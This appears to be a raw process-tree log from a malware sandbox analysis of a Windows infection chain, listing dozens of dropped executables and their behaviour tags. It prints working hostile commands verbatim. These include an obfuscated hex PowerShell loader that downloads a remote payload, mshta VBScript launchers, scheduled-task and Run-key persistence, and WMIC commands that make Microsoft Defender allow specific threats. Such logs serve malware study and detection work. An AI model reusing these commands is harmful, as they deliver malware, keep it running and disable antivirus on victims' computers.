C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\fxeeif5w.t5a\askinstall52.exe & exit9⤵PID:5280
-
C:\Users\Admin\AppData\Local\Temp\fxeeif5w.t5a\askinstall52.exeC:\Users\Admin\AppData\Local\Temp\fxeeif5w.t5a\askinstall52.exe10⤵PID:4076
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4076 -s 174811⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:6260
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\1w2xdd5c.bpr\Cleanpro13.exe & exit9⤵PID:3076
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV110⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5292
-
-
C:\Users\Admin\AppData\Local\Temp\1w2xdd5c.bpr\Cleanpro13.exeC:\Users\Admin\AppData\Local\Temp\1w2xdd5c.bpr\Cleanpro13.exe10⤵PID:4148
-
C:\Users\Admin\Documents\HEZqbjWAH663dAixn5skUTIS.exe"C:\Users\Admin\Documents\HEZqbjWAH663dAixn5skUTIS.exe"11⤵PID:6736
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6736 -s 31612⤵
- Program crash
- Checks processor information in registry
PID:7248
-
-
-
C:\Users\Admin\Documents\xmeNJZF3MCC7JO_CsRcHz0kw.exe"C:\Users\Admin\Documents\xmeNJZF3MCC7JO_CsRcHz0kw.exe"11⤵
- Suspicious use of SetThreadContext
PID:6788 -
C:\ProgramData\Stub.exe"C:\ProgramData\Stub.exe"12⤵PID:7852
-
C:\Users\Admin\AppData\Local\DriverAudioOption.exe"C:\Users\Admin\AppData\Local\DriverAudioOption.exe"13⤵PID:9040
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "AudioEngine" /tr '"C:\Users\Admin\AppData\Roaming\AudioEngine.exe"' & exit14⤵PID:8596
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "AudioEngine" /tr '"C:\Users\Admin\AppData\Roaming\AudioEngine.exe"'15⤵
- Creates scheduled task(s)
PID:4004
-
-
-
C:\Users\Admin\AppData\Roaming\AudioEngine.exe"C:\Users\Admin\AppData\Roaming\AudioEngine.exe"14⤵PID:5168
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "AudioEngine" /tr '"C:\Users\Admin\AppData\Roaming\AudioEngine.exe"' & exit15⤵PID:7652
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "AudioEngine" /tr '"C:\Users\Admin\AppData\Roaming\AudioEngine.exe"'16⤵
- Creates scheduled task(s)
PID:3640
-
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\Telemetry\sihost32.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Telemetry\sihost32.exe"15⤵PID:6792
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\IntilizateComponentFord.exe"C:\Users\Admin\AppData\Local\Temp\IntilizateComponentFord.exe"13⤵PID:9208
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\yvWDHaRgX9.bat"14⤵PID:3152
-
C:\Windows\system32\chcp.comchcp 6500115⤵PID:1564
-
-
C:\Windows\system32\w32tm.exew32tm /stripchart /computer:localhost /period:5 /dataonly /samples:215⤵PID:6668
-
-
C:\Documents and Settings\msedge.exe"C:\Documents and Settings\msedge.exe"15⤵PID:4548
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 4548 -s 126016⤵
- Executes dropped EXE
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:5900
-
-
-
-
-
-
C:\Users\Admin\Documents\xmeNJZF3MCC7JO_CsRcHz0kw.exe"C:\Users\Admin\Documents\xmeNJZF3MCC7JO_CsRcHz0kw.exe"12⤵PID:4432
-
-
-
C:\Users\Admin\Documents\Tlp7KL_8Drd0U39YwFyFiaBJ.exe"C:\Users\Admin\Documents\Tlp7KL_8Drd0U39YwFyFiaBJ.exe"11⤵
- Suspicious use of SetThreadContext
PID:6780 -
C:\Users\Admin\Documents\Tlp7KL_8Drd0U39YwFyFiaBJ.exe"C:\Users\Admin\Documents\Tlp7KL_8Drd0U39YwFyFiaBJ.exe"12⤵PID:7968
-
-
C:\Users\Admin\Documents\Tlp7KL_8Drd0U39YwFyFiaBJ.exe"C:\Users\Admin\Documents\Tlp7KL_8Drd0U39YwFyFiaBJ.exe"12⤵PID:8116
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6780 -s 109612⤵
- Program crash
- Enumerates system info in registry
PID:4076
-
-
-
C:\Users\Admin\Documents\OMOoi5kw5Q2FYlWcZjkZmsbx.exe"C:\Users\Admin\Documents\OMOoi5kw5Q2FYlWcZjkZmsbx.exe"11⤵PID:6772
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6772 -s 28412⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:1404
-
-
-
C:\Users\Admin\Documents\jjntfh0WYe_Zt4bQiX6gzMBo.exe"C:\Users\Admin\Documents\jjntfh0WYe_Zt4bQiX6gzMBo.exe"11⤵
- Adds Run key to start application
PID:6756 -
C:\Windows\SysWOW64\dllhost.exedllhost.exe12⤵PID:7012
-
-
C:\Windows\SysWOW64\cmd.execmd /c cmd < Nobile.docm12⤵PID:6220
-
C:\Windows\SysWOW64\cmd.execmd13⤵PID:7040
-
C:\Windows\SysWOW64\PING.EXEping localhost14⤵
- Runs ping.exe
PID:5052
-
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Rimasta.exe.comRimasta.exe.com J14⤵
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:2644 -
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Rimasta.exe.comC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Rimasta.exe.com J15⤵
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:8236
-
-
-
C:\Windows\SysWOW64\findstr.exefindstr /V /R "^mFzuIhvmvbdHpfegBQvdRBWtkZruqmiMQZvPfzkmbfdsclZwZBnIIvmXJgVJldnWdERlThYiFXSCkFJqZwimwmrxmnuwnBfiQxqRzPi$" Vederlo.docm14⤵PID:6232
-
-
-
-
-
C:\Users\Admin\Documents\NOVPXvnqRpD8jVFci3hxU9pv.exe"C:\Users\Admin\Documents\NOVPXvnqRpD8jVFci3hxU9pv.exe"11⤵
- Suspicious use of SetWindowsHookEx
PID:6748 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $SOS='24#4e#61#6e#6f#3d#27#4a#4f#4f#45#58#27#2e#72#65#70#6c#61#63#65#28#27#4a#4f#4f#27#2c#27#49#27#29#3b#73#61#6c#20#4f#59#20#24#4e#61#6e#6f#3b#64#6f#20#7b#24#70#69#6e#67#20#3d#20#74#65#73#74#2d#63#6f#6e#6e#65#63#74#69#6f#6e#20#2d#63#6f#6d#70#20#67#6f#6f#67#6c#65#2e#63#6f#6d#20#2d#63#6f#75#6e#74#20#31#20#2d#51#75#69#65#74#7d#20#75#6e#74#69#6c#20#28#24#70#69#6e#67#29#3b#24#70#32#32#20#3d#20#5b#45#6e#75#6d#5d#3a#3a#54#6f#4f#62#6a#65#63#74#28#5b#53#79#73#74#65#6d#2e#4e#65#74#2e#53#65#63#75#72#69#74#79#50#72#6f#74#6f#63#6f#6c#54#79#70#65#5d#2c#20#33#30#37#32#29#3b#5b#53#79#73#74#65#6d#2e#4e#65#74#2e#53#65#72#76#69#63#65#50#6f#69#6e#74#4d#61#6e#61#67#65#72#5d#3a#3a#53#65#63#75#72#69#74#79#50#72#6f#74#6f#63#6f#6c#20#3d#20#24#70#32#32#3b#24#61#61#3d#27#77#68#65#78#2d#4f#62#68#65#78#6a#65#27#3b#24#6c#6c#3d#27#28#27#27#68#68#65#78#74#74#68#65#78#70#73#3a#68#65#78#2f#68#65#78#68#65#78#2f#6d#61#6e#6f#72#61#6b#75#73#2e#74#6f#70#2f#50#30#57#33#52#31#2f#49#4e#2e#50#4e#47#27#27#29#27#3b#20#24#62#62#3d#27#63#68#65#78#74#20#4e#65#68#65#78#68#65#78#74#2e#57#68#65#78#68#65#78#68#65#78#68#65#78#68#65#78#65#27#3b#20#24#66#66#3d#27#6c#6f#68#65#78#68#65#78#61#64#68#65#78#68#65#78#68#65#78#68#65#78#68#65#78#53#27#3b#20#24#68#68#3d#27#74#68#65#78#68#65#78#72#69#68#65#78#68#65#78#68#65#78#6e#67#27#3b#20#24#63#31#3d#27#28#68#65#78#68#65#78#4e#68#65#78#68#65#78#68#65#78#68#65#78#65#27#3b#20#24#63#63#3d#27#62#43#68#65#78#68#65#78#68#65#78#6c#69#65#68#65#78#68#65#78#68#65#78#6e#74#27#3b#20#24#64#64#3d#27#29#2e#44#6f#68#65#78#68#65#78#68#65#78#68#65#78#77#68#65#78#68#65#78#68#65#78#68#65#78#68#65#78#6e#27#3b#20#24#52#4f#4f#4d#3d#28#24#63#31#2c#24#61#61#2c#24#62#62#2c#24#63#63#2c#24#64#64#2c#24#66#66#2c#24#68#68#2c#24#6c#6c#20#2d#4a#6f#69#6e#20#27#27#29#3b#24#52#4f#4f#4d#3d#24#52#4f#4f#4d#2e#72#65#70#6c#61#63#65#28#27#68#65#78#27#2c#20#27#27#29#3b#20#4f#59#20#24#52#4f#4f#4d#7c#4f#59#3b';Invoke-Expression (-join ($SOS -split '#' | ? { $_ } | % { [char][convert]::ToUInt32($_,16) }))12⤵
- Blocklisted process makes network request
- Adds Run key to start application
PID:8172 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windo 1 -noexit -exec bypass -file C:\Users\Admin\AppData\Roaming\Desktop\Desktop.ps113⤵
- Blocklisted process makes network request
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Checks processor information in registry
PID:3532
-
-
-
-
C:\Users\Admin\Documents\EG1qGNDC9lY8zincNYtUjdGi.exe"C:\Users\Admin\Documents\EG1qGNDC9lY8zincNYtUjdGi.exe"11⤵PID:6852
-
-
C:\Users\Admin\Documents\TIgLSjVKuZ7czIdrMXef4RHK.exe"C:\Users\Admin\Documents\TIgLSjVKuZ7czIdrMXef4RHK.exe"11⤵PID:6832
-
-
C:\Users\Admin\Documents\R92UkRfzfHjlIWR7AQpKT20Q.exe"C:\Users\Admin\Documents\R92UkRfzfHjlIWR7AQpKT20Q.exe"11⤵PID:6812
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6812 -s 31612⤵
- Program crash
PID:8276
-
-
-
C:\Users\Admin\Documents\bxdOlK4iXQQhPPAWmVwmPwaS.exe"C:\Users\Admin\Documents\bxdOlK4iXQQhPPAWmVwmPwaS.exe"11⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:6944
-
-
C:\Users\Admin\Documents\ikf96lKZ4JnA_XIfWuND_5Rg.exe"C:\Users\Admin\Documents\ikf96lKZ4JnA_XIfWuND_5Rg.exe"11⤵
- Drops file in Program Files directory
PID:6936 -
C:\Program Files (x86)\Company\NewProduct\cutm3.exe"C:\Program Files (x86)\Company\NewProduct\cutm3.exe"12⤵PID:7352
-
-
C:\Program Files (x86)\Company\NewProduct\inst001.exe"C:\Program Files (x86)\Company\NewProduct\inst001.exe"12⤵PID:884
-
-
C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe"C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe"12⤵
- Checks whether UAC is enabled
PID:5488
-
-
-
C:\Users\Admin\Documents\Q09ckwfoQ4QNEIehWCYu8jha.exe"C:\Users\Admin\Documents\Q09ckwfoQ4QNEIehWCYu8jha.exe"11⤵PID:6864
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VbScRIpt: CloSE ( CReATEobJECT ( "WscrIpt.SheLL").Run( "cmD.exe /Q /c TYPE ""C:\Users\Admin\Documents\Q09ckwfoQ4QNEIehWCYu8jha.exe"" > X4d4XArNWDu.eXE&& StArt X4D4XarNWDu.Exe -PXPoqL0iOUHHP7hXFattB5ZvsV & if """"== """" for %A IN (""C:\Users\Admin\Documents\Q09ckwfoQ4QNEIehWCYu8jha.exe"" ) do taskkill /f -im ""%~nxA"" " , 0, trUE ) )12⤵PID:6436
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /Q /c TYPE "C:\Users\Admin\Documents\Q09ckwfoQ4QNEIehWCYu8jha.exe"> X4d4XArNWDu.eXE&& StArt X4D4XarNWDu.Exe -PXPoqL0iOUHHP7hXFattB5ZvsV &if ""== "" for %A IN ("C:\Users\Admin\Documents\Q09ckwfoQ4QNEIehWCYu8jha.exe" ) do taskkill /f -im "%~nxA"13⤵PID:8340
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f -im "Q09ckwfoQ4QNEIehWCYu8jha.exe"14⤵
- Kills process with taskkill
PID:3856
-
-
-
-
-
C:\Users\Admin\Documents\RXtSl1kwfxyS_JvhHPdf_3Ug.exe"C:\Users\Admin\Documents\RXtSl1kwfxyS_JvhHPdf_3Ug.exe"11⤵
- Suspicious use of SetThreadContext
PID:6804 -
C:\Users\Admin\Documents\RXtSl1kwfxyS_JvhHPdf_3Ug.exe"C:\Users\Admin\Documents\RXtSl1kwfxyS_JvhHPdf_3Ug.exe"12⤵PID:7420
-
-
-
C:\Users\Admin\Documents\6j5UI1C7T87QPJ7CU4hDl65T.exe"C:\Users\Admin\Documents\6j5UI1C7T87QPJ7CU4hDl65T.exe"11⤵PID:2176
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST12⤵
- Creates scheduled task(s)
PID:1564
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST12⤵
- Creates scheduled task(s)
PID:5100
-
-
C:\Users\Admin\Documents\qT3dWYBP7ZsuOrwW4ZcUbjl6.exe"C:\Users\Admin\Documents\qT3dWYBP7ZsuOrwW4ZcUbjl6.exe"12⤵PID:1520
-
C:\Users\Admin\Documents\uVhMRg26PQ2KAa0_OYPqifIw.exe"C:\Users\Admin\Documents\uVhMRg26PQ2KAa0_OYPqifIw.exe"13⤵PID:8648
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vBSCRiPT:closE (creatEOBJeCT( "WscriPT.shEll"). RUN("C:\Windows\system32\cmd.exe /C COpy /y ""C:\Users\Admin\Documents\uVhMRg26PQ2KAa0_OYPqifIw.exe"" rOBCqJoQYC.eXe&& sTArT roBCqJOQYC.eXe -P0_6X2fnCLFU6G & iF """" =="""" for %q In (""C:\Users\Admin\Documents\uVhMRg26PQ2KAa0_OYPqifIw.exe"" ) do taskkill -iM ""%~nxq"" /f " ,0 , TrUe ) )14⤵PID:8064
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C COpy /y "C:\Users\Admin\Documents\uVhMRg26PQ2KAa0_OYPqifIw.exe" rOBCqJoQYC.eXe&& sTArT roBCqJOQYC.eXe -P0_6X2fnCLFU6G& iF "" =="" for %q In ("C:\Users\Admin\Documents\uVhMRg26PQ2KAa0_OYPqifIw.exe" ) do taskkill -iM "%~nxq" /f15⤵
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:8748 -
C:\Windows\SysWOW64\taskkill.exetaskkill -iM "uVhMRg26PQ2KAa0_OYPqifIw.exe" /f16⤵
- Modifies WinLogon for persistence
- Adds Run key to start application
- Kills process with taskkill
- Modifies registry class
PID:9208
-
-
-
-
-
C:\Users\Admin\Documents\7XOYzD0noG5zHl3RzmkWjxxq.exe"C:\Users\Admin\Documents\7XOYzD0noG5zHl3RzmkWjxxq.exe"13⤵PID:1880
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1880 -s 29614⤵
- Program crash
PID:2628
-
-
-
C:\Users\Admin\Documents\NWZf0EI1CXDvFBWA_6BuMvRG.exe"C:\Users\Admin\Documents\NWZf0EI1CXDvFBWA_6BuMvRG.exe"13⤵PID:8788
-
-
C:\Users\Admin\Documents\SrvU21sjVztmUE4qtPcmkPPs.exe"C:\Users\Admin\Documents\SrvU21sjVztmUE4qtPcmkPPs.exe"13⤵PID:6932
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6932 -s 30014⤵
- Drops file in Windows directory
- Program crash
- Enumerates system info in registry
PID:8940
-
-
-
C:\Users\Admin\Documents\WdqOpcMjHjg1ZQOJTla1nZgZ.exe"C:\Users\Admin\Documents\WdqOpcMjHjg1ZQOJTla1nZgZ.exe" /mixtwo13⤵PID:8824
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 8824 -s 28014⤵
- Program crash
- Enumerates system info in registry
PID:5748
-
-
-
C:\Users\Admin\Documents\xTlVKtbnxkXzEa_7IHRgU27W.exe"C:\Users\Admin\Documents\xTlVKtbnxkXzEa_7IHRgU27W.exe"13⤵PID:7828
-
C:\ProgramData\234875.exe"C:\ProgramData\234875.exe"14⤵
- Suspicious behavior: SetClipboardViewer
PID:5320
-
-
C:\ProgramData\5591852.exe"C:\ProgramData\5591852.exe"14⤵PID:6052
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 6052 -s 190415⤵
- Program crash
- Enumerates system info in registry
PID:8528
-
-
-
C:\ProgramData\5146653.exe"C:\ProgramData\5146653.exe"14⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:7200
-
-
C:\ProgramData\663228.exe"C:\ProgramData\663228.exe"14⤵PID:7944
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7944 -s 242415⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:8244
-
-
-
-
C:\Users\Admin\Documents\ZES1AKZsE5ckg_jFXYBlDgJM.exe"C:\Users\Admin\Documents\ZES1AKZsE5ckg_jFXYBlDgJM.exe"13⤵PID:132
-
-
C:\Users\Admin\Documents\KPLohF_US3S56KW4x6jJt6dB.exe"C:\Users\Admin\Documents\KPLohF_US3S56KW4x6jJt6dB.exe"13⤵PID:2872
-
C:\Users\Admin\AppData\Local\Temp\is-2CMMF.tmp\KPLohF_US3S56KW4x6jJt6dB.tmp"C:\Users\Admin\AppData\Local\Temp\is-2CMMF.tmp\KPLohF_US3S56KW4x6jJt6dB.tmp" /SL5="$305E4,506127,422400,C:\Users\Admin\Documents\KPLohF_US3S56KW4x6jJt6dB.exe"14⤵
- Loads dropped DLL
PID:7128 -
C:\Users\Admin\AppData\Local\Temp\is-5E7NF.tmp\el34zAN.exe"C:\Users\Admin\AppData\Local\Temp\is-5E7NF.tmp\el34zAN.exe" /S /UID=12415⤵
- Drops file in Drivers directory
- Adds Run key to start application
- Drops file in Program Files directory
PID:8468 -
C:\Program Files\Microsoft Office\SEMYQDCVYL\IDownload.exe"C:\Program Files\Microsoft Office\SEMYQDCVYL\IDownload.exe" /VERYSILENT16⤵PID:9064
-
C:\Users\Admin\AppData\Local\Temp\is-GPTD4.tmp\IDownload.tmp"C:\Users\Admin\AppData\Local\Temp\is-GPTD4.tmp\IDownload.tmp" /SL5="$403DA,994212,425984,C:\Program Files\Microsoft Office\SEMYQDCVYL\IDownload.exe" /VERYSILENT17⤵
- Drops file in Program Files directory
- Suspicious use of FindShellTrayWindow
PID:5072 -
C:\Program Files (x86)\IDownload\IDownload.App.exe"C:\Program Files (x86)\IDownload\IDownload.App.exe" -silent -desktopShortcut -programMenu18⤵
- Drops desktop.ini file(s)
- Drops file in Program Files directory
- Drops file in Windows directory
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:8448 -
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe"C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\qbplb914.cmdline"19⤵PID:6676
-
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES1EBB.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC1EBA.tmp"20⤵PID:7980
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\d7-44501-1c0-89b91-f6c8430c92ea3\Caeshofosipi.exe"C:\Users\Admin\AppData\Local\Temp\d7-44501-1c0-89b91-f6c8430c92ea3\Caeshofosipi.exe"16⤵PID:10216
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.profitabletrustednetwork.com/e2q8zu9hu?key=a971bbe4a40a7216a1a87d8f455f71e617⤵PID:11008
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7fffd50246f8,0x7fffd5024708,0x7fffd502471818⤵PID:11168
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\e2-60368-1bc-85c93-0418ed0b21531\ZHixaejifube.exe"C:\Users\Admin\AppData\Local\Temp\e2-60368-1bc-85c93-0418ed0b21531\ZHixaejifube.exe"16⤵PID:7252
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\suijwrzr.peh\GcleanerEU.exe /eufive & exit17⤵PID:12220
-
C:\Users\Admin\AppData\Local\Temp\suijwrzr.peh\GcleanerEU.exeC:\Users\Admin\AppData\Local\Temp\suijwrzr.peh\GcleanerEU.exe /eufive18⤵PID:13592
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 13592 -s 27619⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:14392
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\wfhptsbq.jb0\installer.exe /qn CAMPAIGN="654" & exit17⤵PID:12468
-
C:\Users\Admin\AppData\Local\Temp\wfhptsbq.jb0\installer.exeC:\Users\Admin\AppData\Local\Temp\wfhptsbq.jb0\installer.exe /qn CAMPAIGN="654"18⤵PID:13196
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\aeg2iwkk.ybd\anyname.exe & exit17⤵PID:13284
-
C:\Users\Admin\AppData\Local\Temp\aeg2iwkk.ybd\anyname.exeC:\Users\Admin\AppData\Local\Temp\aeg2iwkk.ybd\anyname.exe18⤵PID:13536
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\gcgmfair.lou\gcleaner.exe /mixfive & exit17⤵PID:14096
-
C:\Users\Admin\AppData\Local\Temp\gcgmfair.lou\gcleaner.exeC:\Users\Admin\AppData\Local\Temp\gcgmfair.lou\gcleaner.exe /mixfive18⤵PID:14724
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 14724 -s 28019⤵
- Program crash
PID:15368
-
-
-
-
-
-
-
-
-
-
C:\Users\Admin\Documents\86LjLbbU1ji3sfME7RcCXmMG.exe"C:\Users\Admin\Documents\86LjLbbU1ji3sfME7RcCXmMG.exe"11⤵PID:3560
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3560 -s 29212⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:8920
-
-
C:\Users\Admin\AppData\Local\Temp\7zS9859.tmp\SimplInst.exe.\SimplInst.exe12⤵PID:2852
-
C:\Users\Admin\AppData\Local\Temp\7zS9BC4.tmp\SimplInst.exe.\SimplInst.exe /S /site_id "668658"13⤵
- Checks BIOS information in registry
- Drops file in System32 directory
- Enumerates system info in registry
PID:9076 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True" &14⤵PID:2464
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m ping.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True"15⤵PID:6500
-
C:\Windows\SysWOW64\cmd.exe/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True16⤵PID:8744
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True17⤵PID:5352
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True18⤵PID:9472
-
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m calc.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True"15⤵PID:9964
-
C:\Windows\SysWOW64\cmd.exe/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True16⤵PID:8280
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True17⤵PID:6444
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True18⤵PID:3656
-
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True"15⤵PID:8588
-
C:\Windows\SysWOW64\cmd.exe/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True16⤵
- Suspicious use of SetThreadContext
PID:5020 -
